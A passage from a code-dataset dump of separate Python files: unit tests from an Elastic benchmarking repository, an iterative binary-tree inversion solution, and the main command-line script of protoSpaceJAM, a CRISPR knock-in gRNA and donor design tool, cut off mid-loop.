test_bounds_more_clients_than_docs():\n offset, docs = bounds(2, 0, 5)\n assert offset == 0\n assert docs == 1\n offset, docs = bounds(2, 1, 5)\n assert offset == 1\n assert docs == 1\n offset, docs = bounds(2, 2, 5)\n assert docs == 0\n offset, docs = bounds(2, 3, 5)\n assert docs == 0\n offset, docs = bounds(2, 4, 5)\n assert docs == 0\n\n\ndef test_convert_to_gib():\n assert convert_to_gib(\"1GB\") == 1.0\n assert convert_to_gib(\"2G\") == 2.0\n assert convert_to_gib(\"1MB\") == 0.0009765625\n assert convert_to_gib(\"1024M\") == 1.0\n assert convert_to_gib(\"1TB\") == 1024\n assert convert_to_gib(\"2T\") == 2048\n assert convert_to_gib(\"1PB\") == 1048576\n assert convert_to_gib(\"2P\") == 2097152\n","repo_name":"elastic/rally-tracks","sub_path":"elastic/tests/utils/utils_test.py","file_name":"utils_test.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","stars":202,"dataset":"github-code","pt":"3"} +{"seq_id":"24080108705","text":"# 226. Invert Binary Tree\n\n# Given the root of a binary tree, invert the tree, and return its root.\n\n\nclass Solution:\n def invertTree(self, root: Optional[TreeNode]) -> Optional[TreeNode]:\n if not root:\n return None\n stack = [root]\n\n while stack:\n curr = stack.pop()\n \n left = curr.left\n right = curr.right\n curr.left = right\n curr.right = left\n\n if curr.left:\n stack.append(curr.left)\n \n if curr.right:\n stack.append(curr.right)\n\n return root","repo_name":"g-hor/pairing","sub_path":"invertBinaryTree.py","file_name":"invertBinaryTree.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33403285462","text":"import datetime\nimport linecache\nimport logging\nimport os.path\nimport pickle\nimport sys\nimport traceback\nimport time\nimport pandas as pd\n\nfrom protoSpaceJAM.util.utils import MyParser, ColoredLogger, read_pickle_files, cal_elapsed_time, get_gRNAs,get_gRNAs_target_coordinate, \\\n get_HDR_template #uncomment this for pip installation\n\n# from util.utils import MyParser, ColoredLogger, read_pickle_files, cal_elapsed_time, get_gRNAs, get_gRNAs_target_coordinate, \\\n# get_HDR_template\n\ndef parse_args(test_mode=False):\n parser = MyParser(description=\"protoSpaceJAM: perfectionist CRISPR knock-in design at scale\\n\")\n IO = parser.add_argument_group('input/output')\n IO.add_argument(\n \"--path2csv\",\n default=os.path.join(\"input\",\"test_input.csv\"),\n type=str,\n help=\"Path to a csv file containing the input knock-in sites, see input/test_input.csv for an example\\n *required columns*: 'Ensembl_ID' (specifying the transcript ID), and either 'Target_terminus' or 'Chromosome','Coordinate' (specifying the terminus of the transcript or a genomic coordinate in the transcript)\",\n metavar=\"\",\n )\n IO.add_argument(\n \"--outdir\",\n default=os.path.join(\"output\",\"test\"),\n type=str,\n metavar = \"\",\n help=\"Path to the output directory\"\n )\n genome = parser.add_argument_group('genome')\n genome.add_argument(\n \"--genome_ver\",\n default=\"GRCh38\",\n type=str,\n help=\"Genome and version to use, possible values are GRCh38, GRCm39, and GRCz11\",\n metavar=\"\",\n )\n gRNA = parser.add_argument_group('gRNA')\n gRNA.add_argument(\n \"--num_gRNA_per_design\",\n default=1,\n type=int,\n help=\"Number of gRNAs to return per site (default: 1)\",\n metavar=\"\",\n )\n gRNA.add_argument(\n \"--no_regulatory_penalty\",\n default=False,\n action=\"store_true\",\n help=\"Turn off penalty for gRNAs cutting in UTRs or near splice junctions, default: penalty on\",\n )\n payload = parser.add_argument_group('payload')\n payload.add_argument(\n \"--payload\",\n default=\"\",\n type=str,\n help=\"Define the payload sequence for every site, regardless of terminus or coordinates, overrides --Npayload, --Cpayload, POSpayload, --Tag, --Linker\",\n metavar=\"\",\n )\n payload.add_argument(\n \"--Npayload\",\n default=\"ACCGAGCTCAACTTCAAGGAGTGGCAAAAGGCCTTTACCGATATGATGGGTGGCGGATTGGAAGTTTTGTTTCAAGGTCCAGGAAGTGGT\",\n type=str,\n help=\"Payload sequence to use at the N terminus (default: mNG11 + XTEN80): ACCGAGCTCAACTTCAAGGAGTGGCAAAAGGCCTTTACCGATATGATGGGTGGCGGATTGGAAGTTTTGTTTCAAGGTCCAGGAAGTGGT, overrides --Tag and --Linker\",\n metavar=\"\",\n )\n payload.add_argument(\n \"--Cpayload\",\n default=\"GGTGGCGGATTGGAAGTTTTGTTTCAAGGTCCAGGAAGTGGTACCGAGCTCAACTTCAAGGAGTGGCAAAAGGCCTTTACCGATATGATG\",\n type=str,\n help=\"Payload sequence to use at the C terminus (default: XTEN80 + mNG11): GGTGGCGGATTGGAAGTTTTGTTTCAAGGTCCAGGAAGTGGTACCGAGCTCAACTTCAAGGAGTGGCAAAAGGCCTTTACCGATATGATG, overrides --Tag and --Linker\",\n metavar=\"\",\n )\n payload.add_argument(\n \"--POSpayload\",\n default=\"GGTGGCGGATTGGAAGTTTTGTTTCAAGGTCCAGGAAGTGGTACCGAGCTCAACTTCAAGGAGTGGCAAAAGGCCTTTACCGATATGATG\",\n type=str,\n help=\"Payload sequence to use at the specific genomic coordinates (default: XTEN80 + mNG11): GGTGGCGGATTGGAAGTTTTGTTTCAAGGTCCAGGAAGTGGTACCGAGCTCAACTTCAAGGAGTGGCAAAAGGCCTTTACCGATATGATG, overrides --Tag and --Linker\",\n metavar=\"\",\n )\n payload.add_argument(\n \"--Tag\",\n default=\"ACCGAGCTCAACTTCAAGGAGTGGCAAAAGGCCTTTACCGATATGATG\",\n type=str,\n help=\"default is the mNG11 tag\",\n metavar=\"\",\n )\n payload.add_argument(\n \"--Linker\",\n default=\"GGTGGCGGATTGGAAGTTTTGTTTCAAGGTCCAGGAAGTGGT\",\n type=str,\n help=\"default is the XTEN80 linker\",\n metavar=\"\",\n )\n\n donor = parser.add_argument_group('donor')\n donor.add_argument(\n \"--Donor_type\",\n default=\"ssODN\",\n help=\"Set the type of donor, possible values are ssODN and dsDNA (default: ssODN)\",\n type=str,\n metavar=\"\",\n )\n donor.add_argument(\n \"--HA_len\",\n default=500,\n help=\"[dsDNA] Length of the desired homology arm on each side (default: 500)\",\n type=int,\n metavar=\"\",\n )\n donor.add_argument(\n \"--Strand_choice\",\n default=\"auto\",\n help=\"[ssODN] Strand choice of ssoODN, Possible values are 'auto', 'TargetStrand', 'NonTargetStrand', 'CodingStrand' and 'NonCodingStrand'\",\n type=str,\n metavar=\"\",\n )\n donor.add_argument(\n \"--ssODN_max_size\",\n type=int,\n default=200,\n help=\"Enforce a length restraint on the the ssODN donor (default: 200), The ssODN donor will be centered on the payload and the recoded region\",\n metavar=\"\",\n )\n donor.add_argument(\n \"--CheckEnzymes\",\n default=\"\",\n help=\"[dsDNA] Name of Restriction digestion enzymes, separated by '|', to flag and trim, for example BsaI|EcoRI (default: None)\",\n type=str,\n metavar=\"\",\n )\n donor.add_argument(\n \"--CustomSeq2Avoid\",\n default=\"\",\n help=\"[dsDNA] Custom sequences, separated by '|', to flag and trim (default: None)\",\n type=str,\n metavar=\"\",\n )\n donor.add_argument(\n \"--MinArmLenPostTrim\",\n default=0,\n help=\"[dsDNA] Minimum length of the homology arm after trimming. Set to 0 to turn off trimming (default: 0)\",\n type=int,\n metavar=\"\",\n )\n recoding = parser.add_argument_group('recoding')\n recoding.add_argument(\n \"--recoding_off\",\n default=False,\n action=\"store_true\",\n help=\"Turn off *all* recoding\",\n )\n recoding.add_argument(\n \"--recoding_stop_recut_only\",\n default=False,\n action=\"store_true\",\n help=\"Recode the gRNA recognition site to prevent recut\",\n )\n recoding.add_argument(\n \"--recoding_full\",\n default=False,\n action=\"store_true\",\n help=\"Use full recoding: recode both the gRNA recognition site and the cut-to-insert region (default: on)\",\n )\n recoding.add_argument(\n \"--cfdThres\",\n default=0.03,\n help=\"Threshold that protoSpaceJAM will attempt to lower the recut potential (measured by the CFD score) to (default: 0.03)\",\n metavar=\"\",\n )\n recoding.add_argument(\n \"--recode_order\",\n default=\"PAM_first\",\n help=\"Prioritize recoding in the PAM or in protospacer, possible values: protospacer_first, PAM_first (default: PAM_first)\",\n metavar=\"\",\n )\n misc = parser.add_argument_group('misc.')\n misc.add_argument(\n \"--test_mode\",\n default=False,\n help=\"used by the unit tests, not user-oriented\",\n metavar=\"\",\n )\n config = parser.parse_args()\n return config, parser\n\n\ndef main(custom_args=None):\n \"\"\"\n main function\n custom_args: a dict of arguments to override the default arguments\n \"\"\"\n try:\n #set up working directory\n if not os.path.exists(os.path.join(\"precomputed_gRNAs\")):\n if not os.path.exists(os.path.join(\"protoSpaceJAM\", \"precomputed_gRNAs\")):\n sys.exit(\"precomputed_gRNAs folder not found, please run the script from the repo's root directory\")\n else:\n os.chdir(\"protoSpaceJAM\")\n\n logging.setLoggerClass(ColoredLogger)\n # logging.basicConfig()\n log = logging.getLogger(\"protoSpaceJAM\")\n log.propagate = False\n log.setLevel(logging.INFO) # set the level of warning displayed\n # log.setLevel(logging.DEBUG) #set the level of warning displayed\n\n # configs\n config = vars(parse_args()[0])\n parser = parse_args()[1]\n\n # apply custom args\n if not custom_args is None and len(custom_args) > 0:\n for c_arg in custom_args:\n config[c_arg] = custom_args[c_arg]\n\n # Exit if no arguments provided and not in test mode\n if len(sys.argv)==1 and config[\"test_mode\"] == False:\n print(\"[Message] Pleases provide the following arguments: --path2csv --outdir\")\n print(\"[Message] To run a quick example: protoSpaceJAM --path2csv input/test_input.csv --outdir output/test\\n\")\n\n parser.print_help(sys.stderr)\n sys.exit(1)\n\n gRNA_num_out = config[\"num_gRNA_per_design\"]\n max_cut2ins_dist = 50 # deprecated?\n HDR_arm_len = config[\"HA_len\"]\n ssODN_max_size = config[\"ssODN_max_size\"]\n spec_score_flavor = \"guideMITScore\"\n outdir = config[\"outdir\"]\n reg_penalty = not config[\"no_regulatory_penalty\"]\n syn_check_args = {\n \"check_enzymes\": config[\"CheckEnzymes\"],\n \"CustomSeq2Avoid\": config[\"CustomSeq2Avoid\"],\n \"MinArmLenPostTrim\": config[\"MinArmLenPostTrim\"],\n } # dictionary for multiple synthesis check arguments\n\n # check recoding args\n assert (\n config[\"recode_order\"] == \"protospacer_first\"\n or config[\"recode_order\"] == \"PAM_first\"\n )\n if config[\"recoding_full\"] and any(\n [config[\"recoding_off\"], config[\"recoding_stop_recut_only\"]]\n ):\n sys.exit(\n f\"Found conflicts in recoding arguments: --recoding_full cannot be used with --recoding_off or --recoding_stop_recut_only\\nplease correct the issue and try again\"\n )\n if config[\"recoding_off\"] and config[\"recoding_stop_recut_only\"]:\n sys.exit(\n f\"Found conflicts in recoding arguments: --recoding_off cannot be used with --recoding_stop_recut_only\\nplease correct the issue and try again\"\n )\n\n # process recoding args\n if (not config[\"recoding_off\"]) and (not config[\"recoding_stop_recut_only\"]):\n config[\"recoding_full\"] = True\n\n if config[\"recoding_off\"] or config[\"recoding_stop_recut_only\"]:\n config[\"recoding_full\"] = False\n\n recoding_args = {\n \"recoding_off\": config[\"recoding_off\"],\n \"recoding_stop_recut_only\": config[\"recoding_stop_recut_only\"],\n \"recoding_full\": config[\"recoding_full\"],\n \"cfdThres\": float(config[\"cfdThres\"]),\n \"recode_order\": config[\"recode_order\"],\n }\n\n # check donor args\n if not config[\"Donor_type\"] in [\"ssODN\", \"dsDNA\"]:\n sys.exit(\n \"Donor_type must be ssODN or dsDNA, offending value:\"\n + config[\"Donor_type\"]\n + \", please correct the issue and try again\"\n )\n if not config[\"Strand_choice\"] in [\n \"auto\",\n \"TargetStrand\",\n \"NonTargetStrand\",\n \"CodingStrand\",\n \"NonCodingStrand\",\n ]:\n sys.exit(\n \"Strand_choice must be auto,TargetStrand,NonTargetStrand,CodingStrand or NonCodingStrand, offending value:\"\n + config[\"Strand_choice\"]\n + \", please correct the issue and try again\"\n )\n\n # parse payload\n Linker = config[\"Linker\"]\n Tag = config[\"Tag\"]\n\n if config[\"payload\"] == \"\": # no payload override\n if config[\"Npayload\"] == \"\": # no Npayload override\n config[\"Npayload\"] = Tag + Linker\n if config[\"Cpayload\"] == \"\": # no Cpayload override\n config[\"Cpayload\"] = Linker + Tag\n else: # payload override\n config[\"Npayload\"] = config[\"payload\"]\n config[\"Cpayload\"] = config[\"payload\"]\n config[\"POSpayload\"] = config[\"payload\"]\n\n\n # check if HA_len is too short to satisfy ssODN_max_size\n if ssODN_max_size is not None:\n max_payload_size = max([len(config[\"Npayload\"]), len(config[\"Cpayload\"])])\n derived_HDR_arm_len = ssODN_max_size - max_payload_size / 2\n if derived_HDR_arm_len >= HDR_arm_len:\n print(\n f\"HA_len={HDR_arm_len} is to short to meet the requirement of ssODN_max_size={ssODN_max_size}, payload size={max_payload_size}\\n ssODN_max_size={ssODN_max_size} requires HA_len = ssODN_max_size- max_payload_size / 2 = {derived_HDR_arm_len}\"\n )\n HDR_arm_len = derived_HDR_arm_len + 100\n print(f\"HA_len is adjusted to {HDR_arm_len}\")\n\n # TODO: fix the potential infinite loop\n # check memory requirement\n enough_mem = test_memory(4200)\n while not enough_mem: # test if at least 4.2 GB memory is available\n time.sleep(5) # retry in 5 seconds\n enough_mem = test_memory(4200)\n\n starttime = datetime.datetime.now()\n freq_dict = dict()\n\n # load gRNA info index (mapping of chromosomal location to file parts)\n log.info(\"loading precomputed gRNA **index to file parts**\")\n loc2file_index = read_pickle_files(\n os.path.join(\n \"precomputed_gRNAs\",\n \"gRNA_\" + config[\"genome_ver\"],\n \"gRNA.tab.gz.split.BwaMapped.scored\",\n \"loc2file_index.pickle\",\n )\n )\n\n elapsed = cal_elapsed_time(starttime, datetime.datetime.now())\n log.info(f\"finished loading in {elapsed[0]:.2f} min ({elapsed[1]} sec)\")\n\n # load chr location to type (e.g. UTR, cds, exon/intron junction) mappings\n log.info(\n \"loading the mapping of chromosomal location to type (e.g. UTR, cds, exon/intron junction)\"\n )\n loc2posType = read_pickle_files(\n os.path.join(\n \"genome_files\",\n \"parsed_gff3\",\n config[\"genome_ver\"],\n \"loc2posType.pickle\",\n )\n )\n\n elapsed = cal_elapsed_time(starttime, datetime.datetime.now())\n log.info(f\"finished loading in {elapsed[0]:.2f} min ({elapsed[1]} sec)\")\n\n # load gene model info\n # log.info(\"loading gene model info\")\n # ENST_info = read_pickle_files(os.path.join(\"genome_files\",\"parsed_gff3\", config['genome_ver'],\"ENST_info.pickle\"))\n\n # load the mapping of ENST to the info file part\n log.info(\"loading gene model info **index to file parts**\")\n ENST_info_index = read_pickle_files(\n os.path.join(\n \"genome_files\",\n \"parsed_gff3\",\n config[\"genome_ver\"],\n \"ENST_info\",\n \"ENST_info_index.pickle\",\n )\n )\n\n elapsed = cal_elapsed_time(starttime, datetime.datetime.now())\n log.info(f\"finished loading in {elapsed[0]:.2f} min ({elapsed[1]} sec)\")\n\n # load codon phase index\n # log.info(\"loading codon phase info\")\n # ENST_PhaseInCodon = read_pickle_files(os.path.join(\"genome_files\",\"parsed_gff3\", config['genome_ver'],\"ENST_codonPhase.pickle\"))\n\n log.info(\"loading codon phase info **index to file parts**\")\n ENST_PhaseInCodon_index = read_pickle_files(\n os.path.join(\n \"genome_files\",\n \"parsed_gff3\",\n config[\"genome_ver\"],\n \"ENST_codonPhases\",\n \"ENST_codonPhase_index.pickle\",\n )\n )\n\n # report time used\n elapsed = cal_elapsed_time(starttime, datetime.datetime.now())\n log.info(f\"finished loading in {elapsed[0]:.2f} min ({elapsed[1]} sec)\")\n\n # report the number of ENSTs which has ATG at the end of the exon\n # ExonEnd_ATG_count,ExonEnd_ATG_list = count_ATG_at_exonEnd(ENST_info)\n\n # open log files\n mkdir(outdir)\n recut_CFD_all = open(os.path.join(outdir, \"recut_CFD_all.txt\"), \"w\")\n recut_CFD_fail = open(os.path.join(outdir, \"recut_CFD_fail.txt\"), \"w\")\n csvout_N = open(os.path.join(outdir, \"out_Nterm_recut_cfd.csv\"), \"w\")\n csvout_C = open(os.path.join(outdir, \"out_Cterm_recut_cfd.csv\"), \"w\")\n csvout_header = \"ID,cfd1,cfd2,cfd3,cfd4,cfdScan,cfdScanNoRecode,cfd_max\\n\"\n csvout_N.write(csvout_header)\n csvout_C.write(csvout_header)\n fiveUTR_log = open(os.path.join(outdir, \"fiveUTR.txt\"), \"w\")\n\n # open result file and write header\n csvout_res = open(f\"{outdir}/result.csv\", \"w\")\n csvout_res.write(\n f\"Entry,ID,chr,transcript_type,name,terminus,gRNA_name,gRNA_seq,PAM,gRNA_start,gRNA_end,gRNA_cut_pos,edit_pos,distance_between_cut_and_edit(cut_pos-insert_pos),specificity_score,specificity_weight,distance_weight,position_weight,final_weight,cfd_before_recoding,cfd_after_recoding,cfd_after_windowScan_and_recoding,max_recut_cfd,name_of_DNA_donor,DNA donor,name_of_trimmed_DNA_Donor,trimmed_DNA_donor,effective_HA_len,synthesis_problems,cutPos2nearestOffLimitJunc,strand(gene/gRNA/donor)\\n\"\n ) #\"Entry,ID,chr,transcript_type,name,terminus,gRNA_seq,PAM,gRNA_start,gRNA_end,gRNA_cut_pos,edit_pos,distance_between_cut_and_edit(cut pos - insert pos),specificity_score,specificity_weight,distance_weight,position_weight,final_weight,cfd_before_recoding,cfd_after_recoding,cfd_after_windowScan_and_recoding,max_recut_cfd,DNA donor,effective_HA_len,synthesis_problems,cutPos2nearestOffLimitJunc,strand(gene/gRNA/donor)\\n\"\n\n # open result file2 for GenoPrimer input\n csvout_res2 = open(f\"{outdir}/input_for_GenoPrimer.csv\", \"w\")\n csvout_res2.write(f\"Entry,ref,chr,coordinate,ID,geneSymbol\\n\")\n\n # dataframes to store best gRNAs\n best_start_gRNAs = pd.DataFrame()\n best_stop_gRNAs = pd.DataFrame()\n\n # logging cfd score, failed gRNAs etc\n start_info = info()\n stop_info = info()\n\n # load ENST list (the user input list or the whole transcriptome)\n if os.path.isfile(config[\"path2csv\"]):\n log.info(\n f\"begin processing user-supplied list of gene IDs in file {config['path2csv']}\"\n )\n df = pd.read_csv(os.path.join(config[\"path2csv\"]), dtype = str)\n # check csv columns\n keys2check = set([\"Ensembl_ID\"])\n if not keys2check.issubset(df.columns):\n log.error(\n f'Missing columns in the input csv file\\n Required columns:\"Ensembl_ID\"'\n )\n log.info(f\"Please fix the input csv file and try again\")\n sys.exit()\n else:\n sys.exit(f\"ERROR: The input file {config['path2csv']} is not found\")\n # log.warning(f\"The input file {config['path2csv']} is not found, using the whole human transcriptome\")\n # input(\"Press Enter to continue...\")\n # df = pd.DataFrame(ENST_info.keys(), columns = [\"Ensembl_ID\"]) # create data frame from ENST_info\n\n # loop through each entry in the input csv file\n transcript_count = 0\n protein_coding_transcripts_count = 0\n target_terminus = \"None\"\n target_coordinate = \"None\"\n ENST_in_db = False\n ENST_design_counts = {} #used in the names of gRNA and donors\n Entry = 0 # Entry is defined by the portal, and if not using the portal, it is just the index of the row\n for index, row in df.iterrows():\n ENST_ID = row[\"Ensembl_ID\"].rstrip().lstrip()\n if \"Target_terminus\" in df.columns and row.isnull()[\"Target_terminus\"] == False:\n target_terminus = row[\"Target_terminus\"].rstrip().lstrip().upper()\n\n if (\n target_terminus != \"N\"\n and target_terminus != \"C\"\n and target_terminus != \"ALL\"\n and target_terminus != \"\"\n ):\n sys.exit(f\"invalid target terminus: {target_terminus}\")\n\n # determine if the input is ENST-based or coordinate-based\n ENST_based, coordinate_based = False, False\n if \"Chromosome\" in df.columns and \"Coordinate\" in df.columns and row.isnull()[\"Chromosome\"] == False and row.isnull()[\"Coordinate\"] == False:\n chrom = str(row[\"Chromosome\"]).rstrip().lstrip()\n coordinate = str(row[\"Coordinate\"]).rstrip().lstrip()\n if (\n chrom != \"\"\n and coordinate != \"\"\n and coordinate.isdigit()\n ):\n coordinate_based = True\n # if coordinate_based didn't check out, revert to ENST-based\n if coordinate_based == False:\n ENST_based = True\n if not target_terminus in [\"N\",\"C\",\"ALL\"]:\n target_terminus = \"ALL\"\n\n if \"Entry\" in df.columns:\n try:\n Entry = str(row[\"Entry\"]).rstrip().lstrip()\n ENST_in_db = True\n except:\n ENST_in_db = False\n\n # check if ENST_ID is in the database\n if not ENST_ID in ENST_info_index.keys():\n if not ENST_in_db:\n Entry += 1\n log.warning(\n f\"skipping {ENST_ID} b/c transcript is not in the annotated ENST collection (excluding those on chr_patch_hapl_scaff)\"\n )\n genome_ver = config[\"genome_ver\"]\n csvout_res.write(\n f\"{Entry},{ENST_ID},ERROR: this ID was not found in the genome {genome_ver}, most likely this ID was deprecated\\n\"\n )\n continue\n\n # check if codon phase info exists\n if not ENST_ID in ENST_PhaseInCodon_index.keys():\n if not ENST_in_db:\n Entry += 1\n log.warning(\n f\"skipping {ENST_ID} b/c transcript has no codon phase information\"\n )\n csvout_res.write(\n f\"{Entry},{ENST_ID},ERROR: this ID is either not protein-coding and/or has no codon phase information\\n\"\n )\n continue\n\n # load the ENST_info for current ID\n part = ENST_info_index[ENST_ID]\n ENST_info = read_pickle_files(\n os.path.join(\n \"genome_files\",\n \"parsed_gff3\",\n config[\"genome_ver\"],\n \"ENST_info\",\n f\"ENST_info_part{part}.pickle\",\n )\n )\n\n transcript_type = ENST_info[ENST_ID].description.split(\"|\")[1]\n # if transcript_type == \"protein_coding\": # and ENST_ID == \"ENST00000398165\":\n # if not ENST_ID in ExonEnd_ATG_list: # only process edge cases in which genes with ATG are at the end of exons\n # continue\n log.info(f\"processing {ENST_ID}\\ttranscript type: {transcript_type}\")\n\n if hasattr(ENST_info[ENST_ID], \"name\"):\n name = ENST_info[ENST_ID].name\n else:\n name = \"\"\n row_prefix = f\"{ENST_ID},{ENST_info[ENST_ID].chr},{transcript_type},{name}\"\n\n # get codon_phase information for current ENST\n file_parts_list = ENST_PhaseInCodon_index[ENST_ID]\n ENST_PhaseInCodon = {}\n for part in file_parts_list:\n Codon_phase_dict = read_pickle_files(\n os.path.join(\n \"genome_files\",\n \"parsed_gff3\",\n config[\"genome_ver\"],\n \"ENST_codonPhases\",\n f\"ENST_codonPhase_part{str(part)}.pickle\",\n )\n )\n ENST_PhaseInCodon = deepmerge(\n ENST_PhaseInCodon, Codon_phase_dict\n ) # merge file parts if ENST codon info is split among fileparts\n\n ######################################\n # best gRNA for a specific coordinate#\n ######################################\n if coordinate_based == True:\n if not ENST_in_db:\n Entry += 1\n csvout_N.write(ENST_ID)\n #check if the coordinate is in the ENST\n if ENST_info[ENST_ID].chr == chrom and min(ENST_info[ENST_ID].span_start, ENST_info[ENST_ID].span_end) <= int(coordinate) <= max(ENST_info[ENST_ID].span_start, ENST_info[ENST_ID].span_end):\n \n # get gRNAs\n ranked_df_gRNAs_target_pos = get_gRNAs_target_coordinate(\n ENST_ID=ENST_ID,\n chrom = chrom,\n pos = int(coordinate),\n ENST_info=ENST_info,\n freq_dict=freq_dict,\n loc2file_index=loc2file_index,\n loc2posType=loc2posType,\n dist=max_cut2ins_dist,\n genome_ver=config[\"genome_ver\"],\n spec_score_flavor=spec_score_flavor,\n reg_penalty=reg_penalty,\n )\n\n if ranked_df_gRNAs_target_pos.empty == True:\n csvout_res.write(f\"{Entry},{ENST_ID},ERROR: no suitable gRNAs found\\n\")\n\n for i in range(0, min([gRNA_num_out, ranked_df_gRNAs_target_pos.shape[0]])):\n current_gRNA = ranked_df_gRNAs_target_pos.iloc[[i]]\n\n # get HDR template\n try:\n HDR_template = get_HDR_template(\n df=current_gRNA,\n ENST_info=ENST_info,\n type=\"start\", # this borrowed option specifies that the edit is immediately after the coordinate\n ENST_PhaseInCodon=ENST_PhaseInCodon,\n loc2posType=loc2posType,\n genome_ver=config[\"genome_ver\"],\n HDR_arm_len=HDR_arm_len,\n tag=config[\"POSpayload\"],\n ssODN_max_size=ssODN_max_size,\n Donor_type=config[\"Donor_type\"],\n Strand_choice=config[\"Strand_choice\"],\n recoding_args=recoding_args,\n syn_check_args=syn_check_args,\n )\n except Exception as e:\n print(\"Unexpected error:\", str(sys.exc_info()))\n traceback.print_exc()\n print(\"additional information:\", e)\n PrintException()\n\n # append the best gRNA to the final df\n if i == 0:\n best_start_gRNAs = pd.concat([best_start_gRNAs, current_gRNA])\n\n # append cfd score to list for plotting\n pre_recoding_cfd_score = HDR_template.pre_recoding_cfd_score\n cfd1 = \"\"\n if hasattr(HDR_template, \"cfd_score_post_mut_ins\"):\n cfd1 = HDR_template.cfd_score_post_mut_ins\n if not hasattr(HDR_template, \"cfd_score_post_mut2\"):\n cfd2 = cfd1\n else:\n cfd2 = HDR_template.cfd_score_post_mut2\n if not hasattr(HDR_template, \"cfd_score_post_mut3\"):\n cfd3 = cfd2\n else:\n cfd3 = HDR_template.cfd_score_post_mut3\n if not hasattr(HDR_template, \"cfd_score_post_mut4\"):\n cfd4 = cfd3\n else:\n cfd4 = HDR_template.cfd_score_post_mut4\n cfd_scan = 0\n cfd_scan_no_recode = 0\n if hasattr(HDR_template, \"cfd_score_highest_in_win_scan\"):\n cfd_scan = HDR_template.cfd_score_highest_in_win_scan\n cfd_scan_no_recode = HDR_template.scan_highest_cfd_no_recode\n\n cfdfinal = HDR_template.final_cfd\n\n strands = f\"{HDR_template.ENST_strand}/{HDR_template.gStrand}/{HDR_template.Donor_strand}\"\n\n # write csv\n (\n spec_score,\n seq,\n pam,\n s,\n e,\n cut2ins_dist,\n spec_weight,\n dist_weight,\n pos_weight,\n final_weight,\n ) = get_res(current_gRNA, spec_score_flavor)\n donor = HDR_template.Donor_final\n donor_trimmed = \"N/A for ssODN\"\n if config[\"Donor_type\"] == \"dsDNA\":\n donor_trimmed = HDR_template.Donor_final\n donor = HDR_template.Donor_pretrim\n \n # gRNA and donor names\n ENST_design_counts[ENST_ID] = ENST_design_counts.get(ENST_ID, 0) + 1\n gRNA_name = f\"{ENST_ID}_gRNA_{ENST_design_counts[ENST_ID]}\"\n donor_name = f\"{ENST_ID}_donor_{ENST_design_counts[ENST_ID]}\"\n if config[\"Donor_type\"] == \"dsDNA\":\n donor_trimmed_name = f\"{ENST_ID}_donor_trimmed_{ENST_design_counts[ENST_ID]}\"\n else:\n donor_trimmed_name = \"N/A for ssODN\"\n\n gRNA_cut_pos = (\n HDR_template.CutPos\n ) # InsPos is the first letter of stop codon \"T\"AA or the last letter of the start codon AT\"G\"\n insert_pos = HDR_template.InsPos\n if config[\"recoding_off\"]:\n csvout_res.write(\n f\"{Entry},{row_prefix},-,{gRNA_name},{seq},{pam},{s},{e},{gRNA_cut_pos},{insert_pos},{cut2ins_dist},{spec_score},{ret_six_dec(spec_weight)},{ret_six_dec(dist_weight)},{ret_six_dec(pos_weight)},{ret_six_dec(final_weight)},{ret_six_dec(pre_recoding_cfd_score)},recoding turned off,,{ret_six_dec(cfdfinal)},{donor_name},{donor},{donor_trimmed_name},{donor_trimmed},{HDR_template.effective_HA_len},{HDR_template.synFlags},{HDR_template.cutPos2nearestOffLimitJunc},{strands}\\n\"\n )\n csvout_res2.write( f\"{Entry},\"+\n config[\"genome_ver\"]\n + f\",{HDR_template.ENST_chr},{insert_pos},{ENST_ID},{name}\\n\"\n )\n else:\n if not isinstance(cfd4, float):\n cfd4 = \"\"\n csvout_res.write(\n f\"{Entry},{row_prefix},-,{gRNA_name},{seq},{pam},{s},{e},{gRNA_cut_pos},{insert_pos},{cut2ins_dist},{spec_score},{ret_six_dec(spec_weight)},{ret_six_dec(dist_weight)},{ret_six_dec(pos_weight)},{ret_six_dec(final_weight)},{ret_six_dec(pre_recoding_cfd_score)},{ret_six_dec(cfd4)},{ret_six_dec(cfd_scan)},{ret_six_dec(cfdfinal)},{donor_name},{donor},{donor_trimmed_name},{donor_trimmed},{HDR_template.effective_HA_len},{HDR_template.synFlags},{HDR_template.cutPos2nearestOffLimitJunc},{strands}\\n\"\n )\n csvout_res2.write( f\"{Entry},\"+\n config[\"genome_ver\"]\n + f\",{HDR_template.ENST_chr},{insert_pos},{ENST_ID},{name}\\n\"\n )\n\n # write log\n this_log = f\"{HDR_template.info}{HDR_template.info_arm}{HDR_template.info_p1}{HDR_template.info_p2}{HDR_template.info_p3}{HDR_template.info_p4}{HDR_template.info_p5}{HDR_template.info_p6}\\n--------------------final CFD:{ret_six_dec(HDR_template.final_cfd)}\\n donor before any recoding:{HDR_template.Donor_vanillia}\\n donor after all recoding:{HDR_template.Donor_postMut}\\ndonor centered(if applicable):{HDR_template.Donor_final}\\n donor (best strand):{HDR_template.Donor_final}\\n\\n\"\n recut_CFD_all.write(this_log)\n if HDR_template.final_cfd > 0.03:\n recut_CFD_fail.write(this_log)\n\n if hasattr(HDR_template, \"info_phase4_5UTR\"):\n fiveUTR_log.write(\n f\"phase4_UTR\\t{HDR_template.info_phase4_5UTR[0]}\\t{HDR_template.info_phase4_5UTR[1]}\\n\"\n )\n if hasattr(HDR_template, \"info_phase5_5UTR\"):\n fiveUTR_log.write(\n f\"phase5_UTR\\t{HDR_template.info_phase5_5UTR[0]}\\t{HDR_template.info_phase5_5UTR[1]}\\n\"\n )\n else:\n csvout_res.write(f\"{Entry},{ENST_ID},ERROR: provided genomic coordinates are not in the {ENST_ID}\\n\")\n\n ###################################\n # best start gRNA and HDR template#\n ###################################\n if ENST_based == True and (target_terminus == \"ALL\" or target_terminus == \"N\"):\n if not ENST_in_db:\n Entry += 1\n csvout_N.write(ENST_ID)\n # get gRNAs\n ranked_df_gRNAs_ATG, ranked_df_gRNAs_stop = get_gRNAs(\n ENST_ID=ENST_ID,\n ENST_info=ENST_info,\n freq_dict=freq_dict,\n loc2file_index=loc2file_index,\n loc2posType=loc2posType,\n dist=max_cut2ins_dist,\n genome_ver=config[\"genome_ver\"],\n spec_score_flavor=spec_score_flavor,\n reg_penalty=reg_penalty,\n )\n\n if ranked_df_gRNAs_ATG.empty == True:\n start_info.failed.append(ENST_ID)\n csvout_N.write(\",,,,,\\n\")\n csvout_res.write(f\"{Entry},{ENST_ID},ERROR: no suitable gRNAs found\\n\")\n\n for i in 